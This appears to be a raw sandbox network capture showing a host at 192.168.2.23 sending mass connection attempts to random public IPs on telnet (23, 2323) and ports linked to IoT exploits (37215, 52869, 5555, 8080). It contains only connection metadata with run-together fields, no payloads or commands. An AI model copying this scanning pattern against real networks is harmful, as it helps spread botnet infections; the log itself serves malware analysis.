                                                                        Dec 6, 2024 00:37:25.040237904 CET401488443192.168.2.23135.164.100.224
                                                                        Dec 6, 2024 00:37:25.040237904 CET523168080192.168.2.23135.126.129.9
                                                                        Dec 6, 2024 00:37:25.040246010 CET3372249152192.168.2.2378.12.225.52
                                                                        Dec 6, 2024 00:37:25.040246010 CET4018880192.168.2.23114.97.132.46
                                                                        Dec 6, 2024 00:37:25.040251970 CET5505881192.168.2.23159.139.93.221
                                                                        Dec 6, 2024 00:37:25.040256977 CET501628443192.168.2.2394.51.143.66
                                                                        Dec 6, 2024 00:37:25.040256977 CET332405555192.168.2.2346.154.107.107
                                                                        Dec 6, 2024 00:37:25.040266991 CET6081849152192.168.2.23180.14.14.162
                                                                        Dec 6, 2024 00:37:25.040272951 CET5879680192.168.2.23135.195.106.66
                                                                        Dec 6, 2024 00:37:25.040277004 CET580368080192.168.2.23168.177.221.9
                                                                        Dec 6, 2024 00:37:25.040278912 CET490428080192.168.2.2380.79.75.130
                                                                        Dec 6, 2024 00:37:25.040286064 CET3590280192.168.2.2372.133.244.12
                                                                        Dec 6, 2024 00:37:25.040287018 CET4802449152192.168.2.23109.21.59.119
                                                                        Dec 6, 2024 00:37:25.072164059 CET368648080192.168.2.23199.180.164.217
                                                                        Dec 6, 2024 00:37:25.072169065 CET5208652869192.168.2.2360.219.113.177
                                                                        Dec 6, 2024 00:37:25.072177887 CET3496480192.168.2.23142.84.25.59
                                                                        Dec 6, 2024 00:37:25.072181940 CET6049849152192.168.2.23176.11.39.142
                                                                        Dec 6, 2024 00:37:25.072191954 CET3827880192.168.2.23189.94.14.160
                                                                        Dec 6, 2024 00:37:25.072191954 CET5920480192.168.2.2391.228.216.195
                                                                        Dec 6, 2024 00:37:25.072194099 CET547125555192.168.2.23162.132.229.135
                                                                        Dec 6, 2024 00:37:25.072194099 CET4873437215192.168.2.23117.126.26.124
                                                                        Dec 6, 2024 00:37:25.072199106 CET422588080192.168.2.2371.196.229.150
                                                                        Dec 6, 2024 00:37:25.072206020 CET5311880192.168.2.2351.113.150.12
                                                                        Dec 6, 2024 00:37:25.072206020 CET5150280192.168.2.23208.89.103.91
                                                                        Dec 6, 2024 00:37:25.072215080 CET549568443192.168.2.23169.136.171.41
                                                                        Dec 6, 2024 00:37:25.072220087 CET3898480192.168.2.23118.180.224.35
                                                                        Dec 6, 2024 00:37:25.072221041 CET6084449152192.168.2.23198.51.200.4
                                                                        Dec 6, 2024 00:37:25.072228909 CET3771237215192.168.2.23120.234.71.113
                                                                        Dec 6, 2024 00:37:25.072232962 CET4117280192.168.2.2378.224.153.204
                                                                        Dec 6, 2024 00:37:25.072235107 CET341448080192.168.2.2335.7.157.194
                                                                        Dec 6, 2024 00:37:25.072235107 CET4631849152192.168.2.2325.81.31.92
                                                                        Dec 6, 2024 00:37:25.072237968 CET5471481192.168.2.2371.134.34.195
                                                                        Dec 6, 2024 00:37:25.072246075 CET522388443192.168.2.23161.221.155.50
                                                                        Dec 6, 2024 00:37:25.072252035 CET587365555192.168.2.2321.9.78.189
                                                                        Dec 6, 2024 00:37:25.072253942 CET4867452869192.168.2.23105.55.86.99
                                                                        Dec 6, 2024 00:37:25.072256088 CET4884437215192.168.2.23104.21.14.23
                                                                        Dec 6, 2024 00:37:25.072259903 CET475628080192.168.2.233.136.140.156
                                                                        Dec 6, 2024 00:37:25.072263956 CET3839237215192.168.2.2389.182.235.65
                                                                        Dec 6, 2024 00:37:25.072263002 CET530925555192.168.2.23186.155.138.63
                                                                        Dec 6, 2024 00:37:25.072263002 CET3705480192.168.2.2366.147.109.56
                                                                        Dec 6, 2024 00:37:25.072268009 CET520908080192.168.2.2328.200.38.50
                                                                        Dec 6, 2024 00:37:25.072271109 CET4745252869192.168.2.23129.36.10.203
                                                                        Dec 6, 2024 00:37:25.072271109 CET3985237215192.168.2.23222.125.46.14
                                                                        Dec 6, 2024 00:37:25.072274923 CET5887681192.168.2.23188.72.85.37
                                                                        Dec 6, 2024 00:37:25.072283030 CET5550280192.168.2.23204.116.135.152
                                                                        Dec 6, 2024 00:37:25.072288036 CET412968080192.168.2.23162.55.212.5
                                                                        Dec 6, 2024 00:37:25.072288036 CET4224680192.168.2.23120.89.24.126
                                                                        Dec 6, 2024 00:37:25.072290897 CET3962280192.168.2.23157.36.53.29
                                                                        Dec 6, 2024 00:37:25.072299004 CET4548480192.168.2.23139.135.210.223
                                                                        Dec 6, 2024 00:37:25.093930006 CET8142392134.200.81.179192.168.2.23
                                                                        Dec 6, 2024 00:37:25.093981981 CET4239281192.168.2.23134.200.81.179
                                                                        Dec 6, 2024 00:37:25.094609022 CET3721559238201.96.27.103192.168.2.23
                                                                        Dec 6, 2024 00:37:25.094675064 CET5923837215192.168.2.23201.96.27.103
                                                                        Dec 6, 2024 00:37:25.104167938 CET3711080192.168.2.23208.163.47.170
                                                                        Dec 6, 2024 00:37:25.104168892 CET4160480192.168.2.23179.228.190.113
                                                                        Dec 6, 2024 00:37:25.104168892 CET5641480192.168.2.2374.19.36.31
                                                                        Dec 6, 2024 00:37:25.104180098 CET5621680192.168.2.23161.61.64.242
                                                                        Dec 6, 2024 00:37:25.104182005 CET4345652869192.168.2.23155.186.213.135
                                                                        Dec 6, 2024 00:37:25.104188919 CET574048080192.168.2.2370.210.32.219
                                                                        Dec 6, 2024 00:37:25.104192972 CET604105555192.168.2.2394.85.120.28
                                                                        Dec 6, 2024 00:37:25.104197025 CET541868080192.168.2.23139.215.52.168
                                                                        Dec 6, 2024 00:37:25.104197979 CET519328080192.168.2.23107.253.16.191
                                                                        Dec 6, 2024 00:37:25.104206085 CET5964480192.168.2.2333.203.45.114
                                                                        Dec 6, 2024 00:37:25.104209900 CET3977681192.168.2.2333.159.39.237
                                                                        Dec 6, 2024 00:37:25.104216099 CET586108080192.168.2.2393.105.53.36
                                                                        Dec 6, 2024 00:37:25.104217052 CET4393280192.168.2.2392.101.130.81
                                                                        Dec 6, 2024 00:37:25.104219913 CET4755681192.168.2.23131.125.49.114
                                                                        Dec 6, 2024 00:37:25.104229927 CET485868080192.168.2.23219.141.94.102
                                                                        Dec 6, 2024 00:37:25.104232073 CET3734280192.168.2.23132.188.66.237
                                                                        Dec 6, 2024 00:37:25.104238987 CET356688443192.168.2.23110.136.23.91
                                                                        Dec 6, 2024 00:37:25.104243994 CET4978081192.168.2.2341.207.251.25
                                                                        Dec 6, 2024 00:37:25.104244947 CET5219880192.168.2.2375.39.160.17
                                                                        Dec 6, 2024 00:37:25.104254007 CET431348080192.168.2.2312.192.0.3
                                                                        Dec 6, 2024 00:37:25.104257107 CET491588080192.168.2.2378.54.102.47
                                                                        Dec 6, 2024 00:37:25.212702036 CET808058076168.195.148.155192.168.2.23
                                                                        Dec 6, 2024 00:37:25.212717056 CET757436944206.201.29.169192.168.2.23
                                                                        Dec 6, 2024 00:37:25.212759972 CET369447574192.168.2.23206.201.29.169
                                                                        Dec 6, 2024 00:37:25.212765932 CET580768080192.168.2.23168.195.148.155
                                                                        Dec 6, 2024 00:37:25.215658903 CET8055260156.217.155.124192.168.2.23
                                                                        Dec 6, 2024 00:37:25.215713024 CET80805456041.229.171.134192.168.2.23
                                                                        Dec 6, 2024 00:37:25.215723038 CET5526080192.168.2.23156.217.155.124
                                                                        Dec 6, 2024 00:37:25.215728998 CET814083650.34.5.146192.168.2.23
                                                                        Dec 6, 2024 00:37:25.215754986 CET545608080192.168.2.2341.229.171.134
                                                                        Dec 6, 2024 00:37:25.215759039 CET804333074.182.50.165192.168.2.23
                                                                        Dec 6, 2024 00:37:25.215775967 CET805970061.241.212.216192.168.2.23
                                                                        Dec 6, 2024 00:37:25.215775967 CET4083681192.168.2.2350.34.5.146
                                                                        Dec 6, 2024 00:37:25.215795994 CET4333080192.168.2.2374.182.50.165
                                                                        Dec 6, 2024 00:37:25.215804100 CET8048424193.85.195.201192.168.2.23
                                                                        Dec 6, 2024 00:37:25.215817928 CET5970080192.168.2.2361.241.212.216
                                                                        Dec 6, 2024 00:37:25.215826988 CET808044720201.189.210.128192.168.2.23
                                                                        Dec 6, 2024 00:37:25.215837002 CET806007076.89.90.96192.168.2.23
                                                                        Dec 6, 2024 00:37:25.215847015 CET4842480192.168.2.23193.85.195.201
                                                                        Dec 6, 2024 00:37:25.215868950 CET528694550625.28.20.230192.168.2.23
                                                                        Dec 6, 2024 00:37:25.215871096 CET447208080192.168.2.23201.189.210.128
                                                                        Dec 6, 2024 00:37:25.215878963 CET6007080192.168.2.2376.89.90.96
                                                                        Dec 6, 2024 00:37:25.215904951 CET4550652869192.168.2.2325.28.20.230
                                                                        Dec 6, 2024 00:37:25.215924978 CET55556070098.208.13.132192.168.2.23
                                                                        Dec 6, 2024 00:37:25.215953112 CET806003856.187.33.111192.168.2.23
                                                                        Dec 6, 2024 00:37:25.215967894 CET607005555192.168.2.2398.208.13.132
                                                                        Dec 6, 2024 00:37:25.215993881 CET6003880192.168.2.2356.187.33.111
                                                                        Dec 6, 2024 00:37:25.216003895 CET5286948902204.107.55.195192.168.2.23
                                                                        Dec 6, 2024 00:37:25.216016054 CET808036864199.180.164.217192.168.2.23
                                                                        Dec 6, 2024 00:37:25.216037989 CET4890252869192.168.2.23204.107.55.195
                                                                        Dec 6, 2024 00:37:25.216059923 CET368648080192.168.2.23199.180.164.217
                                                                        Dec 6, 2024 00:37:25.216118097 CET528695208660.219.113.177192.168.2.23
                                                                        Dec 6, 2024 00:37:25.216126919 CET8034964142.84.25.59192.168.2.23
                                                                        Dec 6, 2024 00:37:25.216136932 CET4915260498176.11.39.142192.168.2.23
                                                                        Dec 6, 2024 00:37:25.216161013 CET5208652869192.168.2.2360.219.113.177
                                                                        Dec 6, 2024 00:37:25.216161013 CET3496480192.168.2.23142.84.25.59
                                                                        Dec 6, 2024 00:37:25.216175079 CET6049849152192.168.2.23176.11.39.142
                                                                        Dec 6, 2024 00:37:25.228667974 CET8037110208.163.47.170192.168.2.23
                                                                        Dec 6, 2024 00:37:25.228682995 CET8041604179.228.190.113192.168.2.23
                                                                        Dec 6, 2024 00:37:25.228693008 CET805641474.19.36.31192.168.2.23
                                                                        Dec 6, 2024 00:37:25.228720903 CET3711080192.168.2.23208.163.47.170
                                                                        Dec 6, 2024 00:37:25.228725910 CET4160480192.168.2.23179.228.190.113
                                                                        Dec 6, 2024 00:37:25.228727102 CET5641480192.168.2.2374.19.36.31
                                                                        Dec 6, 2024 00:37:25.258167028 CET4239281192.168.2.23134.200.81.179
                                                                        Dec 6, 2024 00:37:25.258200884 CET5923837215192.168.2.23201.96.27.103
                                                                        Dec 6, 2024 00:37:25.314955950 CET6007080192.168.2.2376.89.90.96
                                                                        Dec 6, 2024 00:37:25.315321922 CET607005555192.168.2.2398.208.13.132
                                                                        Dec 6, 2024 00:37:25.317137957 CET5970080192.168.2.2361.241.212.216
                                                                        Dec 6, 2024 00:37:25.317161083 CET447208080192.168.2.23201.189.210.128
                                                                        Dec 6, 2024 00:37:25.317183018 CET4842480192.168.2.23193.85.195.201
                                                                        Dec 6, 2024 00:37:25.317204952 CET4333080192.168.2.2374.182.50.165
                                                                        Dec 6, 2024 00:37:25.317231894 CET545608080192.168.2.2341.229.171.134
                                                                        Dec 6, 2024 00:37:25.317979097 CET4083681192.168.2.2350.34.5.146
                                                                        Dec 6, 2024 00:37:25.317997932 CET5526080192.168.2.23156.217.155.124
                                                                        Dec 6, 2024 00:37:25.318022966 CET369447574192.168.2.23206.201.29.169
                                                                        Dec 6, 2024 00:37:25.318048954 CET580768080192.168.2.23168.195.148.155
                                                                        Dec 6, 2024 00:37:25.336894035 CET6049849152192.168.2.23176.11.39.142
                                                                        Dec 6, 2024 00:37:25.336925983 CET3496480192.168.2.23142.84.25.59
                                                                        Dec 6, 2024 00:37:25.337311029 CET368648080192.168.2.23199.180.164.217
                                                                        Dec 6, 2024 00:37:25.338054895 CET5208652869192.168.2.2360.219.113.177
                                                                        Dec 6, 2024 00:37:25.349662066 CET3711080192.168.2.23208.163.47.170
                                                                        Dec 6, 2024 00:37:25.350059986 CET5641480192.168.2.2374.19.36.31
                                                                        Dec 6, 2024 00:37:25.350085974 CET4160480192.168.2.23179.228.190.113
                                                                        Dec 6, 2024 00:37:25.375983953 CET8142392134.200.81.179192.168.2.23
                                                                        Dec 6, 2024 00:37:25.376512051 CET3721559238201.96.27.103192.168.2.23
                                                                        Dec 6, 2024 00:37:25.412543058 CET4890252869192.168.2.23204.107.55.195
                                                                        Dec 6, 2024 00:37:25.413280010 CET4550652869192.168.2.2325.28.20.230
                                                                        Dec 6, 2024 00:37:25.413307905 CET6003880192.168.2.2356.187.33.111
                                                                        Dec 6, 2024 00:37:25.433624029 CET806007076.89.90.96192.168.2.23
                                                                        Dec 6, 2024 00:37:25.433954000 CET55556070098.208.13.132192.168.2.23
                                                                        Dec 6, 2024 00:37:25.441836119 CET805970061.241.212.216192.168.2.23
                                                                        Dec 6, 2024 00:37:25.441931009 CET808044720201.189.210.128192.168.2.23
                                                                        Dec 6, 2024 00:37:25.441951036 CET8048424193.85.195.201192.168.2.23
                                                                        Dec 6, 2024 00:37:25.441970110 CET804333074.182.50.165192.168.2.23
                                                                        Dec 6, 2024 00:37:25.441986084 CET80805456041.229.171.134192.168.2.23
                                                                        Dec 6, 2024 00:37:25.441998005 CET814083650.34.5.146192.168.2.23
                                                                        Dec 6, 2024 00:37:25.442007065 CET8055260156.217.155.124192.168.2.23
                                                                        Dec 6, 2024 00:37:25.442075014 CET757436944206.201.29.169192.168.2.23
                                                                        Dec 6, 2024 00:37:25.442199945 CET808058076168.195.148.155192.168.2.23
                                                                        Dec 6, 2024 00:37:25.457631111 CET4915260498176.11.39.142192.168.2.23
                                                                        Dec 6, 2024 00:37:25.457639933 CET8034964142.84.25.59192.168.2.23
                                                                        Dec 6, 2024 00:37:25.457751989 CET808036864199.180.164.217192.168.2.23
                                                                        Dec 6, 2024 00:37:25.457777977 CET528695208660.219.113.177192.168.2.23
                                                                        Dec 6, 2024 00:37:25.467400074 CET8037110208.163.47.170192.168.2.23
                                                                        Dec 6, 2024 00:37:25.467677116 CET805641474.19.36.31192.168.2.23
                                                                        Dec 6, 2024 00:37:25.467693090 CET8041604179.228.190.113192.168.2.23
                                                                        Dec 6, 2024 00:37:25.530232906 CET5286948902204.107.55.195192.168.2.23
                                                                        Dec 6, 2024 00:37:25.534012079 CET528694550625.28.20.230192.168.2.23
                                                                        Dec 6, 2024 00:37:25.534089088 CET806003856.187.33.111192.168.2.23
                                                                        Dec 6, 2024 00:37:25.857793093 CET419731023192.168.2.2361.32.186.221
                                                                        Dec 6, 2024 00:37:25.857804060 CET4197323192.168.2.2397.251.154.139
                                                                        Dec 6, 2024 00:37:25.857821941 CET4197323192.168.2.23142.83.138.85
                                                                        Dec 6, 2024 00:37:25.857845068 CET4197323192.168.2.23163.214.52.200
                                                                        Dec 6, 2024 00:37:25.857846975 CET4197323192.168.2.2327.185.47.121
                                                                        Dec 6, 2024 00:37:25.857863903 CET4197323192.168.2.23108.22.254.133
                                                                        Dec 6, 2024 00:37:25.857872009 CET4197323192.168.2.2340.143.4.149
                                                                        Dec 6, 2024 00:37:25.857889891 CET4197323192.168.2.2393.83.115.224
                                                                        Dec 6, 2024 00:37:25.857889891 CET4197323192.168.2.2339.201.178.84
                                                                        Dec 6, 2024 00:37:25.857906103 CET4197323192.168.2.23110.149.146.228
                                                                        Dec 6, 2024 00:37:25.857917070 CET4197323192.168.2.23151.160.160.130
                                                                        Dec 6, 2024 00:37:25.857917070 CET419732323192.168.2.23195.240.227.136
                                                                        Dec 6, 2024 00:37:25.857944965 CET4197323192.168.2.23207.84.182.98
                                                                        Dec 6, 2024 00:37:25.857956886 CET4197323192.168.2.2362.145.186.95
                                                                        Dec 6, 2024 00:37:25.857971907 CET4197323192.168.2.2388.173.60.197
                                                                        Dec 6, 2024 00:37:25.857979059 CET4197323192.168.2.2365.67.69.20
                                                                        Dec 6, 2024 00:37:25.857989073 CET4197323192.168.2.2319.167.77.229
                                                                        Dec 6, 2024 00:37:25.857992887 CET4197323192.168.2.231.93.177.172
                                                                        Dec 6, 2024 00:37:25.858007908 CET4197323192.168.2.2343.89.80.45
                                                                        Dec 6, 2024 00:37:25.858007908 CET419732323192.168.2.23175.196.84.105
                                                                        Dec 6, 2024 00:37:25.858023882 CET4197323192.168.2.2378.24.186.183
                                                                        Dec 6, 2024 00:37:25.858035088 CET4197323192.168.2.23114.37.187.1
                                                                        Dec 6, 2024 00:37:25.858042955 CET4197323192.168.2.2385.233.159.178
                                                                        Dec 6, 2024 00:37:25.858055115 CET4197323192.168.2.23168.213.242.89
                                                                        Dec 6, 2024 00:37:25.858093023 CET4197323192.168.2.2371.97.8.186
                                                                        Dec 6, 2024 00:37:25.858097076 CET4197323192.168.2.2387.107.207.134
                                                                        Dec 6, 2024 00:37:25.858108997 CET4197323192.168.2.2365.213.124.200
                                                                        Dec 6, 2024 00:37:25.858118057 CET419732323192.168.2.23125.220.204.168
                                                                        Dec 6, 2024 00:37:25.858122110 CET4197323192.168.2.2312.92.218.88
                                                                        Dec 6, 2024 00:37:25.858135939 CET4197323192.168.2.23218.151.108.231
                                                                        Dec 6, 2024 00:37:25.858143091 CET4197323192.168.2.23192.72.132.207
                                                                        Dec 6, 2024 00:37:25.858150005 CET4197323192.168.2.2312.44.140.197
                                                                        Dec 6, 2024 00:37:25.858159065 CET4197323192.168.2.23116.91.139.59
                                                                        Dec 6, 2024 00:37:25.858166933 CET4197323192.168.2.2348.181.72.85
                                                                        Dec 6, 2024 00:37:25.858175039 CET4197323192.168.2.23145.61.158.239
                                                                        Dec 6, 2024 00:37:25.858185053 CET4197323192.168.2.234.191.97.130
                                                                        Dec 6, 2024 00:37:25.858195066 CET4197323192.168.2.2382.208.232.122
                                                                        Dec 6, 2024 00:37:25.858206034 CET419732323192.168.2.2381.97.120.69
                                                                        Dec 6, 2024 00:37:25.858210087 CET4197323192.168.2.23147.31.42.199
                                                                        Dec 6, 2024 00:37:25.858223915 CET4197323192.168.2.23135.179.125.59
                                                                        Dec 6, 2024 00:37:25.858225107 CET4197323192.168.2.2397.144.13.182
                                                                        Dec 6, 2024 00:37:25.858234882 CET4197323192.168.2.2360.222.187.148
                                                                        Dec 6, 2024 00:37:25.858241081 CET4197323192.168.2.2388.131.206.9
                                                                        Dec 6, 2024 00:37:25.858247995 CET4197323192.168.2.23102.40.134.100
                                                                        Dec 6, 2024 00:37:25.858262062 CET4197323192.168.2.2376.68.204.30
                                                                        Dec 6, 2024 00:37:25.858268976 CET4197323192.168.2.2340.185.218.26
                                                                        Dec 6, 2024 00:37:25.858279943 CET4197323192.168.2.2363.124.160.187
                                                                        Dec 6, 2024 00:37:25.858289003 CET419732323192.168.2.2383.91.62.122
                                                                        Dec 6, 2024 00:37:25.858298063 CET4197323192.168.2.23106.106.81.71
                                                                        Dec 6, 2024 00:37:25.858313084 CET4197323192.168.2.2392.38.141.9
                                                                        Dec 6, 2024 00:37:25.858313084 CET4197323192.168.2.2341.63.14.117
                                                                        Dec 6, 2024 00:37:25.858325958 CET4197323192.168.2.23192.146.225.48
                                                                        Dec 6, 2024 00:37:25.858336926 CET4197323192.168.2.2317.115.122.42
                                                                        Dec 6, 2024 00:37:25.858350039 CET4197323192.168.2.23169.25.0.73
                                                                        Dec 6, 2024 00:37:25.858350992 CET4197323192.168.2.23222.145.202.119
                                                                        Dec 6, 2024 00:37:25.858362913 CET4197323192.168.2.23159.68.125.164
                                                                        Dec 6, 2024 00:37:25.858372927 CET4197323192.168.2.23100.150.6.133
                                                                        Dec 6, 2024 00:37:25.858385086 CET419732323192.168.2.2364.245.19.242
                                                                        Dec 6, 2024 00:37:25.858385086 CET4197323192.168.2.2340.114.122.3
                                                                        Dec 6, 2024 00:37:25.858397961 CET4197323192.168.2.2392.233.132.253
                                                                        Dec 6, 2024 00:37:25.858406067 CET4197323192.168.2.2344.142.119.229
                                                                        Dec 6, 2024 00:37:25.858417988 CET4197323192.168.2.2363.56.42.56
                                                                        Dec 6, 2024 00:37:25.858417988 CET4197323192.168.2.23120.205.242.214
                                                                        Dec 6, 2024 00:37:25.858437061 CET4197323192.168.2.23182.210.144.86
                                                                        Dec 6, 2024 00:37:25.858444929 CET4197323192.168.2.2380.64.94.87
                                                                        Dec 6, 2024 00:37:25.858453035 CET4197323192.168.2.2370.229.171.249
                                                                        Dec 6, 2024 00:37:25.858468056 CET4197323192.168.2.2394.51.74.117
                                                                        Dec 6, 2024 00:37:25.858469963 CET419732323192.168.2.23172.80.243.14
                                                                        Dec 6, 2024 00:37:25.858481884 CET4197323192.168.2.2354.34.87.103
                                                                        Dec 6, 2024 00:37:25.858494043 CET4197323192.168.2.23188.1.224.251
                                                                        Dec 6, 2024 00:37:25.858496904 CET4197323192.168.2.2335.99.102.2
                                                                        Dec 6, 2024 00:37:25.858510017 CET4197323192.168.2.2323.192.244.225
                                                                        Dec 6, 2024 00:37:25.858520985 CET4197323192.168.2.23171.52.201.170
                                                                        Dec 6, 2024 00:37:25.858525991 CET4197323192.168.2.23185.78.58.101
                                                                        Dec 6, 2024 00:37:25.858532906 CET4197323192.168.2.2371.164.154.93
                                                                        Dec 6, 2024 00:37:25.858542919 CET4197323192.168.2.23212.82.237.198
                                                                        Dec 6, 2024 00:37:25.858547926 CET4197323192.168.2.23113.116.253.25
                                                                        Dec 6, 2024 00:37:25.858561039 CET419732323192.168.2.23151.136.135.76
                                                                        Dec 6, 2024 00:37:25.858568907 CET4197323192.168.2.23149.209.255.194
                                                                        Dec 6, 2024 00:37:25.858576059 CET4197323192.168.2.23123.213.27.45
                                                                        Dec 6, 2024 00:37:25.858583927 CET4197323192.168.2.23166.65.31.28
                                                                        Dec 6, 2024 00:37:25.858609915 CET4197323192.168.2.23116.169.230.69
                                                                        Dec 6, 2024 00:37:25.858609915 CET4197323192.168.2.23133.40.83.79
                                                                        Dec 6, 2024 00:37:25.858625889 CET4197323192.168.2.2340.130.166.198
                                                                        Dec 6, 2024 00:37:25.858633995 CET4197323192.168.2.235.124.69.141
                                                                        Dec 6, 2024 00:37:25.858643055 CET4197323192.168.2.23155.94.32.83
                                                                        Dec 6, 2024 00:37:25.858655930 CET419732323192.168.2.2362.119.82.232
                                                                        Dec 6, 2024 00:37:25.858655930 CET4197323192.168.2.23179.200.106.198
                                                                        Dec 6, 2024 00:37:25.858664989 CET4197323192.168.2.2385.55.20.127
                                                                        Dec 6, 2024 00:37:25.858670950 CET4197323192.168.2.23157.232.237.4
                                                                        Dec 6, 2024 00:37:25.858688116 CET4197323192.168.2.2395.57.228.252
                                                                        Dec 6, 2024 00:37:25.858688116 CET4197323192.168.2.234.28.43.21
                                                                        Dec 6, 2024 00:37:25.858697891 CET4197323192.168.2.23216.111.134.255
                                                                        Dec 6, 2024 00:37:25.858712912 CET4197323192.168.2.23220.214.203.66
                                                                        Dec 6, 2024 00:37:25.858719110 CET4197323192.168.2.23165.70.222.44
                                                                        Dec 6, 2024 00:37:25.858735085 CET419732323192.168.2.2390.107.82.26
                                                                        Dec 6, 2024 00:37:25.858737946 CET4197323192.168.2.23179.227.254.66
                                                                        Dec 6, 2024 00:37:25.858745098 CET4197323192.168.2.2339.210.212.238
                                                                        Dec 6, 2024 00:37:25.858755112 CET4197323192.168.2.2372.118.67.12
                                                                        Dec 6, 2024 00:37:25.858768940 CET4197323192.168.2.23122.111.14.99
                                                                        Dec 6, 2024 00:37:25.858778954 CET4197323192.168.2.2382.232.131.81
                                                                        Dec 6, 2024 00:37:25.858786106 CET4197323192.168.2.23114.103.28.112
                                                                        Dec 6, 2024 00:37:25.858787060 CET4197323192.168.2.2339.226.0.157
                                                                        Dec 6, 2024 00:37:25.858855963 CET4197323192.168.2.23184.170.201.250
                                                                        Dec 6, 2024 00:37:25.858860970 CET4197323192.168.2.23111.4.233.37
                                                                        Dec 6, 2024 00:37:25.858885050 CET4197323192.168.2.23123.8.194.13
                                                                        Dec 6, 2024 00:37:25.858894110 CET4197323192.168.2.23204.151.17.217
                                                                        Dec 6, 2024 00:37:25.858905077 CET4197323192.168.2.23122.95.158.165
                                                                        Dec 6, 2024 00:37:25.858915091 CET4197323192.168.2.2390.120.149.93
                                                                        Dec 6, 2024 00:37:25.858923912 CET4197323192.168.2.23150.235.214.211
                                                                        Dec 6, 2024 00:37:25.858936071 CET4197323192.168.2.23118.224.143.89
                                                                        Dec 6, 2024 00:37:25.858942986 CET4197323192.168.2.23122.198.249.58
                                                                        Dec 6, 2024 00:37:25.858958960 CET4197323192.168.2.2320.221.110.40
                                                                        Dec 6, 2024 00:37:25.858958960 CET4197323192.168.2.23179.181.12.246
                                                                        Dec 6, 2024 00:37:25.858975887 CET419732323192.168.2.23187.141.211.187
                                                                        Dec 6, 2024 00:37:25.858978033 CET4197323192.168.2.2343.184.203.51
                                                                        Dec 6, 2024 00:37:25.858987093 CET4197323192.168.2.23140.216.178.129
                                                                        Dec 6, 2024 00:37:25.858993053 CET419731023192.168.2.23189.154.205.125
                                                                        Dec 6, 2024 00:37:25.859011889 CET4197323192.168.2.2379.14.213.236
                                                                        Dec 6, 2024 00:37:25.859011889 CET4197323192.168.2.23196.29.79.188
                                                                        Dec 6, 2024 00:37:25.859031916 CET4197323192.168.2.2389.252.83.120
                                                                        Dec 6, 2024 00:37:25.859038115 CET4197323192.168.2.23102.130.3.66
                                                                        Dec 6, 2024 00:37:25.859055042 CET419732323192.168.2.23192.77.206.211
                                                                        Dec 6, 2024 00:37:25.859055042 CET4197323192.168.2.23116.111.17.170
                                                                        Dec 6, 2024 00:37:25.859061956 CET4197323192.168.2.23112.35.124.217
                                                                        Dec 6, 2024 00:37:25.859069109 CET4197323192.168.2.2365.235.13.175
                                                                        Dec 6, 2024 00:37:25.859078884 CET4197323192.168.2.23221.84.84.48
                                                                        Dec 6, 2024 00:37:25.859088898 CET4197323192.168.2.2359.37.174.151
                                                                        Dec 6, 2024 00:37:25.859095097 CET4197323192.168.2.23221.25.252.57
                                                                        Dec 6, 2024 00:37:25.859101057 CET4197323192.168.2.2397.249.228.68
                                                                        Dec 6, 2024 00:37:25.859112978 CET4197323192.168.2.23193.140.120.90
                                                                        Dec 6, 2024 00:37:25.859117031 CET4197323192.168.2.23123.175.204.32
                                                                        Dec 6, 2024 00:37:25.859127045 CET4197323192.168.2.23105.188.107.214
                                                                        Dec 6, 2024 00:37:25.859144926 CET4197323192.168.2.23113.205.167.35
                                                                        Dec 6, 2024 00:37:25.859146118 CET419732323192.168.2.2393.113.143.240
                                                                        Dec 6, 2024 00:37:25.859152079 CET4197323192.168.2.2384.14.80.96
                                                                        Dec 6, 2024 00:37:25.859169006 CET4197323192.168.2.2381.69.97.10
                                                                        Dec 6, 2024 00:37:25.859169006 CET4197323192.168.2.2369.8.21.155
                                                                        Dec 6, 2024 00:37:25.859184980 CET4197323192.168.2.2360.2.230.245
                                                                        Dec 6, 2024 00:37:25.859189987 CET4197323192.168.2.23106.121.102.212
                                                                        Dec 6, 2024 00:37:25.859208107 CET4197323192.168.2.23212.163.107.24
                                                                        Dec 6, 2024 00:37:25.859214067 CET4197323192.168.2.23103.77.177.196
                                                                        Dec 6, 2024 00:37:25.859215975 CET4197323192.168.2.23179.198.241.2
                                                                        Dec 6, 2024 00:37:25.859215975 CET4197323192.168.2.2374.72.172.138
                                                                        Dec 6, 2024 00:37:25.859234095 CET419732323192.168.2.23184.16.92.235
                                                                        Dec 6, 2024 00:37:25.859237909 CET4197323192.168.2.2375.83.129.35
                                                                        Dec 6, 2024 00:37:25.859245062 CET4197323192.168.2.2383.76.18.2
                                                                        Dec 6, 2024 00:37:25.859258890 CET4197323192.168.2.2390.144.153.244
                                                                        Dec 6, 2024 00:37:25.859261036 CET4197323192.168.2.23103.28.166.221
                                                                        Dec 6, 2024 00:37:25.859273911 CET4197323192.168.2.23109.49.3.72
                                                                        Dec 6, 2024 00:37:25.859286070 CET4197323192.168.2.23194.150.117.58
                                                                        Dec 6, 2024 00:37:25.859286070 CET4197323192.168.2.23222.41.0.164
                                                                        Dec 6, 2024 00:37:25.859293938 CET4197323192.168.2.23204.224.219.10
                                                                        Dec 6, 2024 00:37:25.859302998 CET4197323192.168.2.23174.245.225.149
                                                                        Dec 6, 2024 00:37:25.972841024 CET10234197361.32.186.221192.168.2.23
                                                                        Dec 6, 2024 00:37:25.972932100 CET419731023192.168.2.2361.32.186.221
                                                                        Dec 6, 2024 00:37:25.976208925 CET234197397.251.154.139192.168.2.23
                                                                        Dec 6, 2024 00:37:25.976222992 CET2341973142.83.138.85192.168.2.23
                                                                        Dec 6, 2024 00:37:25.976272106 CET4197323192.168.2.2397.251.154.139
                                                                        Dec 6, 2024 00:37:25.976275921 CET4197323192.168.2.23142.83.138.85
                                                                        Dec 6, 2024 00:37:25.979051113 CET2341973163.214.52.200192.168.2.23
                                                                        Dec 6, 2024 00:37:25.979103088 CET4197323192.168.2.23163.214.52.200
                                                                        Dec 6, 2024 00:37:25.982158899 CET234197327.185.47.121192.168.2.23
                                                                        Dec 6, 2024 00:37:25.982208014 CET4197323192.168.2.2327.185.47.121
                                                                        Dec 6, 2024 00:37:25.982228041 CET2341973108.22.254.133192.168.2.23
                                                                        Dec 6, 2024 00:37:25.982247114 CET234197340.143.4.149192.168.2.23
                                                                        Dec 6, 2024 00:37:25.982261896 CET234197393.83.115.224192.168.2.23
                                                                        Dec 6, 2024 00:37:25.982270002 CET4197323192.168.2.23108.22.254.133
                                                                        Dec 6, 2024 00:37:25.982274055 CET2341973151.160.160.130192.168.2.23
                                                                        Dec 6, 2024 00:37:25.982283115 CET4197323192.168.2.2340.143.4.149
                                                                        Dec 6, 2024 00:37:25.982292891 CET234197339.201.178.84192.168.2.23
